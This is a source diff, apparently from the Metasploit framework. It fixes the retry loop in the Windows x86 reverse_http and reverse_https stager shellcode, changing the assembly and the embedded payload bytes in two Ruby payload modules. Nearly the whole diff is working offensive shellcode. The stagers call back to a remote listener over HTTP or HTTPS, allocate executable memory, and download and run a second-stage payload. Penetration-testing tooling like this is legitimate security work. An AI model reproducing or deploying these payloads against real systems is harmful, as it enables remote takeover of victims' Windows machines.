diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm index 3d6cb2c1c0..20c4f643e6 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm +++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm @@ -75,7 +75,7 @@ got_server_uri: set_retry: push byte 0x10 - pop ecx + pop edi send_request: @@ -110,7 +110,8 @@ httpsendrequest: jnz short allocate_memory try_it_again: - loopnz send_request + dec edi + jnz send_request ; if we didn't allocate before running out of retries, fall through to ; failure diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index dc2095c32d..505f889864 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -33,11 +33,11 @@ module Metasploit3 }, 'Payload' => - # Built on Tue Feb 4 09:05:59 2014 + # Built on Tue Feb 4 11:36:42 2014 # Name: stager_reverse_http - # Length: 316 bytes + # Length: 317 bytes # LEPort Offset: 180 - # ExitFunk Offset: 237 + # ExitFunk Offset: 238 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + @@ -49,15 +49,16 @@ module Metasploit3 "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" + "\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" + "\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" + - "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x39\x50\x68\x57\x89\x9F\xC6" + - "\xFF\xD5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xEB\x28\x53\x50\x68" + - "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x59\x53\x53\x53\x53\x56\x68" + - "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x17\xE0\xEE\x68\xF0\xB5\xA2" + - "\x56\xFF\xD5\xEB\x42\xE8\xD3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" + - "\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58" + - "\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00\x00" + - "\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xBF\x8B\x07\x01" + - "\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x7E\xFF\xFF\xFF" + "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x3A\x50\x68\x57\x89\x9F\xC6" + + "\xFF\xD5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xEB\x29\x53\x50\x68" + + "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x53\x53\x53\x53\x56\x68" + + "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75\xED\x68\xF0\xB5" + + "\xA2\x56\xFF\xD5\xEB\x42\xE8\xD2\xFF\xFF\xFF\x2F\x31\x32\x33\x34" + + "\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68" + + "\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00" + + "\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xBF\x8B\x07" + + "\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x7D\xFF\xFF\xFF" + } )) diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index ae8312b43c..7c7d449b8f 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -33,11 +33,11 @@ module Metasploit3 }, 'Payload' => - # Built on Tue Feb 4 09:05:59 2014 + # Built on Tue Feb 4 11:36:42 2014 # Name: stager_reverse_https - # Length: 336 bytes + # Length: 337 bytes # LEPort Offset: 180 - # ExitFunk Offset: 257 + # ExitFunk Offset: 258 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + @@ -49,16 +49,17 @@ module Metasploit3 "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" + "\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" + "\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" + - "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x4D\x50\x68\x57\x89\x9F\xC6" + - "\xFF\xD5\x53\x68\x00\x32\xE0\x84\x53\x53\x53\xEB\x3C\x53\x50\x68" + - "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x59\x68\x80\x33\x00\x00\x89" + + "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x4E\x50\x68\x57\x89\x9F\xC6" + + "\xFF\xD5\x53\x68\x00\x32\xE0\x84\x53\x53\x53\xEB\x3D\x53\x50\x68" + + "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x68\x80\x33\x00\x00\x89" + "\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x53\x53" + - "\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x17\xE0\xDA" + - "\x68\xF0\xB5\xA2\x56\xFF\xD5\xEB\x42\xE8\xBF\xFF\xFF\xFF\x2F\x31" + - "\x32\x33\x34\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40" + - "\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68" + - "\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74" + - "\xBF\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x6A\xFF\xFF\xFF" + "\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75" + + "\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\xEB\x42\xE8\xBE\xFF\xFF\xFF\x2F" + + "\x31\x32\x33\x34\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" + + "\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" + + "\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" + + "\x74\xBF\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x69\xFF\xFF" + + "\xFF" } ))